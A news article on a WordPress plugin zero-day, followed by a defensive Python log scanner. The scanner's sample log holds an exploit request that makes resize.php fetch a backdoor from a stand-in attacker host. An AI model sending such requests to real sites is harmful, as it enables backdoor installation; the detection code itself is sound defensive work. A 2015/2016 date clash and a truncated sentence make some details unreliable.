Attackers have been using a newly discovered zero-day in the WP Mobile Detector plugin to upload backdoor scripts on WordPress sites, and are currently using it to upload adult-themed SEO spam on affected websites.
The plugin is a simple tool that detects mobile users and allows webmasters to load a specific mobile-friendly theme based on the user’s device.
Zero-day is in the plugin’s image upload & resize script
The team at Plugin Vulnerabilities have discovered that the plugin features an arbitrary file upload vulnerability in the “/wp-content/plugins/wp-mobile-detector/resize.php” file.
This file handles image uploads, and according to the researchers that discovered the security bug, lacks basic input filtering, allowing an attacker to pass a malicious file that gets uploaded to the plugin’s /cache directory.
Using this vulnerability, attackers can upload PHP-based backdoors to WordPress sites, something that should have been almost impossible in 2016, after almost two decades of PHP coding and basic lessons in file upload security.
Zero-day exploited since May 26, 2015
The Plugin Vulnerabilities team says it discovered this backdoor on May 29 when it also notified the developer. Two days later, the team also notified Automattic, who removed the plugin from the WordPress.org Plugin Directory.
At the time it was removed, the plugin had. In the meantime, the developer has patched his plugin, which was reuploaded to the Plugin Directory, but now only around 1,000 users are running it on their sites, after webmasters rushed to uninstall the insecure extension.
Many did so because US security firm Sucuri revealed that its Web Application Firewall had detected attacks using this vulnerability since May 26, three days before the Plugin Vulnerabilities team discovered it, and five days before Automattic removed the plugin from the Plugin Directory.
Hackers uploaded a backdoor on the site with the password “dinamit”
Sucuri’s Douglas Santos says the vulnerability is trivial to exploit and that the backdoor script (css.php) is protected by the password “dinamit”, the Russian word for dynamite.
The WP Mobile Detector zero-day works regardless of what image processing library is installed on the server, so there’s no connection to the ImageTragick vulnerability.
The Plugin Vulnerabilities team says the only condition is that the server has PHP’s allow_url_fopen option enabled. WP Mobile Detector version 3.6 fixed the zero-day, and the plugin has since been updated to version 3.7.
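As an added defender-side example (not code from the article, the plugin, or either research team), the following Python scans web server access log lines for the two traces of this attack the article describes: a request to resize.php whose query string carries a remote URL (the fetch that needs allow_url_fopen), and a later request that executes a .php file from the plugin’s cache directory. The query parameter name, the attacker host and the log lines themselves are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache combined log format; not real traffic.
# The parameter name "src" and the host attacker.example are assumptions.
SAMPLE_LOG = """\
203.0.113.5 - - [26/May/2016:10:12:01 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http%3A%2F%2Fattacker.example%2Fcss.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [26/May/2016:10:12:03 +0000] "GET /wp-content/plugins/wp-mobile-detector/cache/css.php HTTP/1.1" 200 44 "-" "Mozilla/5.0"
198.51.100.7 - - [26/May/2016:10:15:22 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=logo.png&w=320 HTTP/1.1" 200 9031 "-" "Mozilla/5.0"
198.51.100.7 - - [26/May/2016:10:15:23 +0000] "GET /wp-content/plugins/wp-mobile-detector/cache/logo-320.png HTTP/1.1" 200 9031 "-" "Mozilla/5.0"
"""

PLUGIN_DIR = "/wp-content/plugins/wp-mobile-detector/"
# Schemes that PHP's allow_url_fopen lets file functions open remotely.
REMOTE_SCHEMES = ("http", "https", "ftp")
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_request(target):
    """Return a finding label for one request target, or None if benign.

    'remote-fetch'   : resize.php asked to fetch a remote URL (any parameter).
    'cache-php-exec' : a .php file under the plugin's cache/ directory was hit,
                       which is where the article says uploads land.
    """
    parts = urlsplit(target)
    if not parts.path.startswith(PLUGIN_DIR):
        return None
    rel = parts.path[len(PLUGIN_DIR):]
    if rel == "resize.php":
        # parse_qsl percent-decodes values, so encoded URLs are caught too.
        for _, value in parse_qsl(parts.query, keep_blank_values=True):
            if urlsplit(value).scheme.lower() in REMOTE_SCHEMES:
                return "remote-fetch"
    if rel.startswith("cache/") and rel.lower().endswith(".php"):
        return "cache-php-exec"
    return None


def scan_log(text):
    """Yield (client_ip, finding, target) for every suspicious log line."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        kind = classify_request(m.group("target"))
        if kind:
            findings.append((m.group("ip"), kind, m.group("target")))
    return findings


if __name__ == "__main__":
    for ip, kind, target in scan_log(SAMPLE_LOG):
        print(f"{ip}\t{kind}\t{target}")
```

A client that produces a remote-fetch followed by a cache-php-exec is the sequence worth blocking and investigating; a resize.php request with only local image names, as in the third sample line, is normal plugin use.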